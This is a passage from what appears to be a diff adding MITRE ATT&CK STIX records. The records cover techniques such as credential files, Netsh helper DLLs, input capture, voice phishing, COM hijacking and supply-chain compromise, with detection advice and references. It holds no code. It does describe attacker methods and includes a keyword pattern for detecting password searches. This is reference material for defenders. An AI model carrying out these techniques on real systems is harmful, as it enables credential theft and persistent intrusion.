stored in local configuration and credential files. In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files. (Citation: Specter Ops - Cloud Credential Storage)\n\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Microsoft Threat Intelligence Center (MSTIC)" + ], + "x_mitre_detection": "While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "IaaS", + "Linux", + "macOS" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "Administrator", + "SYSTEM" + ], + "x_mitre_system_requirements": [ + "Access to files" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "created": "2017-05-31T21:31:02.188Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1081", + "external_id": "T1081" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/639.html", + "external_id": "CAPEC-639" + }, + { + "source_name": "CG 2014", + "description": "CG. (2014, May 20). Mimikatz Against Virtual Machine Memory Part 1. Retrieved November 12, 2014.", + "url": "http://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html" + }, + { + "source_name": "SRD GPP", + "description": "Security Research and Defense. (2014, May 13). MS14-025: An Update for Group Policy Preferences. Retrieved January 28, 2015.", + "url": "http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx" + }, + { + "source_name": "Specter Ops - Cloud Credential Storage", + "description": "Maddalena, C.. (2018, September 12). Head in the Clouds. Retrieved October 4, 2019.", + "url": "https://posts.specterops.io/head-in-the-clouds-bd038bb69e48" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Software", + "description": "Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or for initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect host software information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--baf60e1a-afe5-4d31-830f-1b1ba2351884", + "created": "2020-10-02T16:42:17.482Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1592/002", + "external_id": "T1592.002" + }, + { + "source_name": "ATT ScanBox", + "description": "Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020.", + "url": "https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks" + }, + { + "source_name": "ThreatConnect Infrastructure Dec 2020", + "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.", + "url": "https://threatconnect.com/blog/infrastructure-research-hunting/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Netsh Helper DLL", + "description": "Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\\SOFTWARE\\Microsoft\\Netsh.\n\nAdversaries can use netsh.exe with helper DLLs to proxy execution of arbitrary code in a persistent manner when netsh.exe is executed automatically with another Persistence technique or if other persistent software is present on the system that executes netsh.exe as part of its normal functionality. Examples include some VPN software that invoke netsh.exe. (Citation: Demaske Netsh Persistence)\n\nProof of concept code exists to load Cobalt Strike's payload using netsh.exe helper DLLs. (Citation: Github Netsh Helper CS Beacon)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Matthew Demaske, Adaptforward" + ], + "x_mitre_detection": "It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior. Monitor the HKLM\\SOFTWARE\\Microsoft\\Netsh registry key for any new or suspicious entries that do not correlate with known system files or benign software. (Citation: Demaske Netsh Persistence)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "x_mitre_system_requirements": [ + "{{LinkByID|S0108}}" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--bb0e0cb5-f3e4-4118-a4cb-6bf13bfbc9f2", + "created": "2017-05-31T21:31:40.168Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1128", + "external_id": "T1128" + }, + { + "source_name": "TechNet Netsh", + "description": "Microsoft. (n.d.). Using Netsh. Retrieved February 13, 2017.", + "url": "https://technet.microsoft.com/library/bb490939.aspx" + }, + { + "source_name": "Demaske Netsh Persistence", + "description": "Demaske, M. (2016, September 23). USING NETSHELL TO EXECUTE EVIL DLLS AND PERSIST ON A HOST. Retrieved April 8, 2017.", + "url": "https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html" + }, + { + "source_name": "Github Netsh Helper CS Beacon", + "description": "Smeets, M. (2016, September 26). NetshHelperBeacon. Retrieved February 13, 2017.", + "url": "https://github.com/outflankbv/NetshHelperBeacon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Input Capture", + "description": "Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "John Lambert, Microsoft Threat Intelligence Center" + ], + "x_mitre_detection": "Detection may vary depending on how input is captured but may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke), monitoring for malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), and ensuring no unauthorized drivers or kernel modules that could indicate keylogging or API hooking are present.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM", + "root", + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2", + "created": "2017-05-31T21:30:48.323Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1056", + "external_id": "T1056" + }, + { + "source_name": "Adventures of a Keystroke", + "description": "Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth look into keyloggers on Windows. Retrieved April 27, 2016.", + "url": "http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-15T11:49:40.990Z", + "name": "Spearphishing Voice", + "description": "Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.\n\nAll forms of phishing are electronically delivered social engineering. In this scenario, adversaries are not directly sending malware to a victim vice relying on [User Execution](https://attack.mitre.org/techniques/T1204) for delivery and execution. For example, victims may receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools ([Remote Access Software](https://attack.mitre.org/techniques/T1219)) onto their computer.(Citation: Unit42 Luna Moth)\n\nAdversaries may also combine voice phishing with [Multi-Factor Authentication Request Generation](https://attack.mitre.org/techniques/T1621) in order to trick users into divulging MFA credentials or accepting authentication prompts.(Citation: Proofpoint Vishing)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Office 365", + "SaaS", + "Google Workspace" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--bb5e59c4-abe7-40c7-8196-e373cb1e5974", + "created": "2023-09-07T21:50:08.827Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1566/004", + "external_id": "T1566.004" + }, + { + "source_name": "CISA Remote Monitoring and Management Software", + "description": "CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring and Management Software. Retrieved February 2, 2023.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa23-025a" + }, + { + "source_name": "Unit42 Luna Moth", + "description": "Kristopher Russo. (n.d.). Luna Moth Callback Phishing Campaign. Retrieved February 2, 2023.", + "url": "https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/" + }, + { + "source_name": "sygnia Luna Month", + "description": "Oren Biderman, Tomer Lahiyani, Noam Lifshitz, Ori Porag. (n.d.). LUNA MOTH: THE THREAT ACTORS BEHIND RECENT FALSE SUBSCRIPTION SCAMS. Retrieved February 2, 2023.", + "url": "https://blog.sygnia.co/luna-moth-false-subscription-scams" + }, + { + "source_name": "Proofpoint Vishing", + "description": "Proofpoint. (n.d.). What Is Vishing?. Retrieved September 8, 2023.", + "url": "https://www.proofpoint.com/us/threat-reference/vishing" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Exploits", + "description": "Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)\n\nAs with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.\n\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--bbc3cba7-84ae-410d-b18b-16750731dfa2", + "created": "2020-10-01T01:48:15.511Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1587/004", + "external_id": "T1587.004" + }, + { + "source_name": "NYTStuxnet", + "description": "William J. Broad, John Markoff, and David E. Sanger. (2011, January 15). Israeli Test on Worm Called Crucial in Iran Nuclear Delay. Retrieved March 1, 2017.", + "url": "https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html" + }, + { + "source_name": "Irongeek Sims BSides 2017", + "description": "Stephen Sims. (2017, April 30). Microsoft Patch Analysis for Exploitation. Retrieved October 16, 2020.", + "url": "https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Social Media", + "description": "Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.\n\nAdversaries may search in different social media sites depending on what information they seek to gather. Threat actors may passively harvest data from these sites, as well as use information gathered to create fake profiles/groups to elicit victim’s into revealing specific information (i.e. [Spearphishing Service](https://attack.mitre.org/techniques/T1598/001)).(Citation: Cyware Social Media) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--bbe5b322-e2af-4a5e-9625-a4e62bf84ed3", + "created": "2020-10-02T16:49:31.262Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1593/001", + "external_id": "T1593.001" + }, + { + "source_name": "Cyware Social Media", + "description": "Cyware Hacker News. (2019, October 2). How Hackers Exploit Social Media To Break Into Your Company. Retrieved October 20, 2020.", + "url": "https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Component Object Model Hijacking", + "description": "Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.(Citation: Microsoft Component Object Model) References to various COM objects are stored in the Registry. \n\nAdversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Elastic" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations (ex: [Reg](https://attack.mitre.org/software/S0075)) replacing known binary paths with unknown paths or otherwise malicious content. Even though some third-party applications define user COM objects, the presence of objects within HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\ may be anomalous and should be investigated since user objects will be loaded prior to machine objects in HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\.(Citation: Elastic COM Hijacking) Registry entries for existing COM objects may change infrequently. When an entry with a known good path and binary is replaced or changed to an unusual value to point to an unknown binary in a new location, then it may indicate suspicious behavior and should be investigated. \n\nLikewise, if software DLL loads are collected and analyzed, any unusual DLL load that can be correlated with a COM object Registry modification may indicate COM hijacking has been performed. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", + "created": "2020-03-16T14:12:47.923Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1546/015", + "external_id": "T1546.015" + }, + { + "source_name": "Elastic COM Hijacking", + "description": "Ewing, P. Strom, B. (2016, September 15). How to Hunt: Detecting Persistence & Evasion with the COM. Retrieved September 15, 2016.", + "url": "https://www.elastic.co/blog/how-hunt-detecting-persistence-evasion-com" + }, + { + "source_name": "GDATA COM Hijacking", + "description": "G DATA. (2014, October). COM Object hijacking: the discreet way of persistence. Retrieved August 13, 2016.", + "url": "https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence" + }, + { + "source_name": "Microsoft Component Object Model", + "description": "Microsoft. (n.d.). The Component Object Model. Retrieved August 18, 2016.", + "url": "https://msdn.microsoft.com/library/ms694363.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-04-14T23:29:10.396Z", + "name": "Credentials", + "description": "Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.\n\nAdversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then add malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Finally, where multi-factor authentication (MFA) based on out-of-band communications is in use, adversaries may compromise a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)\n\nGathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Vinayak Wadhwa, Lucideus", + "Lee Christensen, SpecterOps", + "Toby Kohlenberg" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161", + "created": "2020-10-02T14:55:43.815Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1589/001", + "external_id": "T1589.001" + }, + { + "source_name": "ATT ScanBox", + "description": "Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020.", + "url": "https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks" + }, + { + "source_name": "Detectify Slack Tokens", + "description": "Detectify. (2016, April 28). Slack bot token leakage exposing business critical information. Retrieved October 19, 2020.", + "url": "https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/" + }, + { + "source_name": "GitHub truffleHog", + "description": "Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October 19, 2020.", + "url": "https://github.com/dxa4481/truffleHog" + }, + { + "source_name": "Register Uber", + "description": "McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub into court to find who hacked database of 50,000 drivers. Retrieved October 19, 2020.", + "url": "https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/" + }, + { + "source_name": "GitHub Gitrob", + "description": "Michael Henriksen. (2018, June 9). Gitrob: Putting the Open Source in OSINT. Retrieved October 19, 2020.", + "url": "https://github.com/michenriksen/gitrob" + }, + { + "source_name": "CNET Leaks", + "description": "Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020.", + "url": "https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/" + }, + { + "source_name": "Okta Scatter Swine 2022", + "description": "Okta. (2022, August 25). Detecting Scatter Swine: Insights into a Relentless Phishing Campaign. Retrieved February 24, 2023.", + "url": "https://sec.okta.com/scatterswine" + }, + { + "source_name": "Forbes GitHub Creds", + "description": "Sandvik, R. (2014, January 14). Attackers Scrape GitHub For Cloud Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved October 19, 2020.", + "url": "https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196" + }, + { + "source_name": "Register Deloitte", + "description": "Thomson, I. (2017, September 26). Deloitte is a sitting duck: Key systems with RDP open, VPN and proxy 'login details leaked'. Retrieved October 19, 2020.", + "url": "https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-24T14:00:00.188Z", + "name": "Compromise Software Supply Chain", + "description": "Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.\n\nTargeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00", + "created": "2020-03-11T14:17:21.153Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1195/002", + "external_id": "T1195.002" + }, + { + "source_name": "Avast CCleaner3 2018", + "description": "Avast Threat Intelligence Team. (2018, March 8). New investigations into the CCleaner incident point to a possible third stage that had keylogger capacities. Retrieved March 15, 2018.", + "url": "https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities" + }, + { + "source_name": "Command Five SK 2011", + 